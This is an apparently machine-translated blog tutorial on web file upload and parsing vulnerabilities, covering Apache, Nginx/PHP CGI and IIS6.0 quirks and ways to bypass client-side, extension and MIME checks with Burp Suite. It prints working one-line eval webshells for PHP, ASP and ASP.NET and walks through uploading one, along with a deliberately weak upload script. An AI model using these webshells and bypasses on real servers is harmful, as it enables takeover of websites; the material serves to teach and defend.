Zhangxiaobai's way of penetration (V) -- detailed explanation of upload vulnerability and parsing vulnerability

Preface

web Applications often have the ability to upload files , For example, in BBS Post pictures 、 Publish compression package on personal website , as long as web The application allows you to upload files , There may be a file upload vulnerability .
Upload vulnerability and sql Injection compared to , The risk is greater , If web There is an upload vulnerability in the application , The attacker can even upload a webshell To the server .
So how to confirm web Is there an upload vulnerability in the application ？ such as , my CSDN Blog , from php To write , Allow uploading avatars , However, the image format is not verified when uploading the file , Causes the user to be able to upload any file , So this is an upload vulnerability .

Parsing vulnerabilities

When an attacker exploits an upload vulnerability , Usually with web The container's parsing vulnerability goes hand in hand . So let's first look at the parsing vulnerability , In this way, we can have a deeper understanding of upload vulnerabilities , And take precautions .
common web The container has IIS、Ngnix、Apache、Tomcat etc. , Let's say Apache Take container as an example .（IIS6.0 It is also a classic container instance for parsing vulnerabilities , We can learn by ourselves , Xiaobai likes to strike orders , I don't like to look for it from time to time , Not much research ……）
Apache Parsing vulnerabilities
stay Apache 1.x and Apache 2.x There is a parsing vulnerability in , But they are with IIS The parsing vulnerability is different . such as , The following is a typical Apache Parsing vulnerabilities .（ Stop staring , see url……）

You can see , The image above url The file name in is 1.php.rar, Under normal circumstances , A prompt box for file download should pop up , But at this time there is no , It shows phpinfo() The content of , This is it. Apache The parsing vulnerability of .1.php.rar Is as follows ：

<?php
	phpinfo();
?>

Apache There is a principle when parsing files ： When you encounter an extension you don't know , Will parse from back to front , Until you come across an extension you know , If you don't know , Will expose its source code . such as ：

1.php.rar.xs.aa

Apache First of all, it will parse aa Extension , If you don't know , Will parse xs Extension , This goes all the way to the extension you know , And then parse it .
ps:Apache Supported extensions can be found in Apache Installation directory “/conf/mime.types” There is a detailed list of extensions in the file , As shown in the figure below .

Some program developers upload the design of the file , To determine whether the file name is php、asp、aspx、asa、cer Wait for script extensions , If it is , Upload is not allowed , At this time, the attacker may upload 1.php.rar And other extensions to bypass program detection , And cooperate to resolve the vulnerability , Get webshell.

To resolve the vulnerability PHP CGI Parsing vulnerabilities
Nginx It's a high-performance web The server , Usually used as php Resolution container for ,Nginx It has also been exposed to two “ Parsing vulnerabilities ”, For example, visit

http://www.litbai.com/1.jpg/1.php

At this time 1.php It doesn't exist , But you can see 1.jpg According to php Script to parse , That's the problem “1.php” On . This means that attackers can upload legitimate “ picture ”（ Picture Trojan horse ）, And then in URL Followed by “/xxx.php”, You can get the website Webshell.
stay 2008 year 5 month , Famous safety team in China 80SEC This vulnerability has been discovered ,, The vulnerability description URL is ： http://www.80sec.com/nginx-securit-securit.html
But then people found out , This is not Nginx Unique vulnerabilities , stay IIS7.0、IIS7.5、Lighttpd etc. Web Such parsing vulnerabilities often occur in containers .
Later, people gradually found that , This parsing vulnerability is actually PHP CGI A loophole in the . stay php There is a key option in the configuration file ：cgi.fi:x_pathinfo.
This option is on by default in some versions , Access on startup URL, such as ：

http://www.litbai.com/x.txt/x.php

x.php Is a nonexistent file , therefore php Will recursively parse forward , This creates a parsing vulnerability , It can be said that this vulnerability is related to Nginx It's not a big relationship , But because of Nginx And PHP Cooperation can easily lead to such a parsing vulnerability , therefore PHP CGI Vulnerabilities are often thought of as Nginx Parsing vulnerabilities .

Bypass upload vulnerability

Programmers are developing web Application time , It usually involves file uploading , such as ： Upload documents and provide downloads , Upload pictures to increase the customer experience . The basic process of file uploading is the same , Client side usage Javascript verification , The server uses random numbers to rename files , To prevent file duplication .
Programmers can prevent upload vulnerabilities in the following two ways .

• Client detection ： Client side usage javascript testing , When the file is not uploaded , Just verify the file .
• Server side detection ： The server script will generally detect the file MIME type , Check whether the file extension is legal , Some programmers even detect whether malicious code is embedded in files .
  Before studying upload vulnerabilities , First, let's look at two gadgets ： Chinese kitchen knife and a sentence picture Trojan horse .
  Chinese kitchen knife
  This software is used to manage website files , Very small and flexible , He just needs a short piece of code to easily manage the website . Chinese kitchen knife has become a necessary weapon for safety researchers , Its official website is ：http://www,maicaidao.com
  The server-side file provided by the software has only one line of code . Currently supported server-side scripts include ：PHP、ASP、ASP.NET、JSP etc. , And support HTTPS Securely connected websites . The common code is as follows ：

ASP:        
<%eval request("Cknife")%>
　	
ASP.NET:    
<%@ Page Language="Jscript"%><%eval(Request.Item["Cknife"],"unsafe");%>

PHP:        
<?php @eval($_POST['Cknife']);?>

Because the code is short and concise , So it is called a one sentence Trojan horse by hackers （ In a word, the back door ）
take <?php @eval($_POST['Cknife']);?> Save as shell.php, Uploaded to the PHP In the host space , Configure the kitchen knife for connection . Please refer to https://blog.csdn.net/Litbai_zhang/article/details/82984795

Generally, there are two ways to upload vulnerabilities ： Client side detection and server side detection

Client detection

Many programmers just go through javascript To illegally refuse file upload . This verification can also prevent upload errors for some ordinary users , For professional technicians , This is very low-level validation . Attackers can break through client authentication in a number of ways . The following is a very simple file upload example , Use javascript verification .
Upload.html Page using javascript Verify the file extension , If it is not an extension in the whitelist , that Form The form will not be submitted to the server , The code is as follows ：

  <html>
    <head>
    <title> Image upload <title>
    <script type="text/javascript">
    function checkFile() 
    {
    	var flag =false;                                  // Whether the flag bit can be uploaded 
    	var str =document.getElementById("file").value;   // Get the file name 
    	str = str.substring(str.lastIndexOf('.')+1);      // Get the extension 
    	var arr = new Array('png','bmp','gif','jpg');    // Extensions allowed to upload 
    	for(var i=0 ; i<arr.length;i++)
    	  {
    	  	if(str==arr[i])
    	  		{
    	  			flag = true;                         // Loop to determine whether the file name is legal 
    	  		}
    	  }
    	  	if(!flag)
    	  		{
    	  			alert(' The document is illegal ！！');
    	  		}
    	  	return flag;
    }
    </script>
    </head>
    <body>
    	<form action="upload.php" method="post" onsubmit="checkFile" enctype = "multipart/form-data">
    		<input type="file"  name="file" id="file" /><br/>
    		<input type="submit" value=" Submit " name="submit"/>
    	</form>
    </body>
</html>

Upload.php To receive documents , After receiving the file , Rename file , Then put it in this directory , As shown in the following code ：

<?php
	if(isset($_POST["submit"]))
	{
		$name = $_FILES['file']['name'];                       // Receive filename 
		$name = md5(data('Y-m-d h:m:s')).strrchr($name,".");   // File rename operation , Keep the original extension 
		$size = $_FILES['file']['size'];                       // Receive file size 
		$tmp = $_FILES['file']['tmp_name'];                    // Temporary path 
		move_uploaded_file($tmp,$name);                        // Move temporary files to the current file directory 
		echo " File upload succeeded ！path:".$name;
	}
?>

There are many ways to bypass client authentication （ That is, the front-end bypasses ）, Xiaobai likes （ It's just ） use burpsuite To capture packets “ Man-in-the-middle attack ”（ Another is through debugging tools such as Firebug（ however Firebug I didn't study it after I stopped ） Directly delete the client's authentication ）,burpsuit The implementation principle of is to follow the normal process javascript verification , Then in the transmission HTTP Layer makes hands and feet . Let's briefly talk about the implementation idea , First, change the Trojan file extension to the extension of a normal picture , such as JPG Extension , Use... When uploading Burpsuit Intercept uploaded data , And then add the extension JPG It is amended as follows PHP, You can bypass client authentication .
Here's a little bit of attention ： stay HTTP There is a request header in the protocol Content-Length, Represents the length of the entity body , If at this time filename Modification also means that the length of the entity body increases or decreases , This should be modified Content-Length Request header , Such as ：Content-Length The length is 200, Put... In the file stream filename="xxxxx.jpg" It is amended as follows filename=“1.php”. After the change , The entity body is missing 4 Characters , So we need to Content-Length Change the length to 196. If you do not modify the upload, it may fail .
ps:
emphasize ： Any client-side authentication is not secure . Client side validation is to prevent user input errors , Reduce server overhead , Only server-side verification can really protect against attackers .

Server side detection

With the improvement of security awareness of developers , There are fewer and fewer front-end verification attacks , It is usually put on the server side for verification . There are many types of server-side authentication , Because every programmer thinks differently , So the filtering method is also different . But it mainly includes the following points ： Whitelist and blacklist extension filtering 、 File type detection 、 File rename and other operations . It seems to be impeccable , But don't forget , That is the parsing vulnerability . If developers don't think about parsing , Upload vulnerability and resolve vulnerability , Most upload verifications can be bypassed .
1. White list and blacklist verification
When uploading files , Most programmers will detect file extensions , There are usually two ways to verify file extensions ： White list and blacklist .（ So two simple words don't explain the meaning ）

1. Suppose a blacklist is set , Attackers can find... From the blacklist web Extensions ignored by developers , Such as :cer
2. stay windows Under the system , If the filename is ".“ Or a space as the end , The system will automatically remove ”." And spaces , This feature can also be used to bypass the blacklist verification . For example, upload “asp.” perhaps “asp_”（ The underscore here is a space ） Extension program , The server receives the file name and writes the file ,windows Decimal points and spaces will be removed automatically .
   The above example is not difficult to see , Blacklist filtering alone cannot prevent upload vulnerabilities , Because there are too many unknown risks , We can't predict .
   3. However, the white list has a better defense mechanism than the black list . Such as ：$WhiteList=array('rar','jpg','png','gif','mp4','doc'); After the file extension is obtained, the $WhiteList The extension in the array is determined iteratively , If the file extension is hit , The program will consider the document legal , Otherwise, it is not allowed to upload .
   Although the white list filtering method can protect against unknown risks , But you can't rely entirely on the white list , Because the white list can not completely protect against upload vulnerabilities , for example IIS6.0, The attacker changed the Trojan file name to pentest.asp;1.jpg Upload , At this time, the file is jpg Format , So as to successfully pass the certification , and IIS But it will pentest.asp;1.jpg As ASP Script program to execute , Finally, the attacker can bypass the detection of the white list , And execute the Trojan horse program .
   therefore , The white list mechanism is only the first step to prevent upload vulnerabilities .

2.MIME verification
MIME Type is used to set the opening method of a file with an extension , When a file with an extension is accessed , The browser will automatically use the specified application to open . Such as GIF picture MIME by image/gif,CSS Of documents MIME The type is text/css.
We can see through the packet capturing MIME The type is generally in Content-Type You can see in this attribute .

When uploading a php file （MIME The value is application/php） when , Suppose our server only allows image/jpeg The passage of type , Then direct upload will certainly fail , We go through burpsuit take HTTP In the request Content-Type Change to image/jpeg type , In this way, it can be verified by the program .
3. Directory validation
When the file is uploaded , Programs usually allow users to put files in a specified directory , But some of them web To make the code more “ robust ”, Usually do an operation , If the specified directory exists , Just write the file to the directory , If it doesn't exist, create a directory first , And then write .

Text editor upload vulnerability

Because Xiaobai's ability is limited , There are many kinds of text editors , for example CKEditor、Ewebeditor、UEditor、KindEditor、XHeditor etc. , For the time being, there is no one Understand , Simply put , The function of this kind of editor is very similar , For example, pictures are uploaded 、 Video uploading 、 Remote download and other functions , This type of text editor also becomes a rich text editor . Using this kind of editor reduces the time of program development , But it has increased many security risks , such as ： Use CKEditor The editor has 10 Million websites , If CKEditor There's one Getshell Loophole , So this 10 Ten thousand websites have been implicated .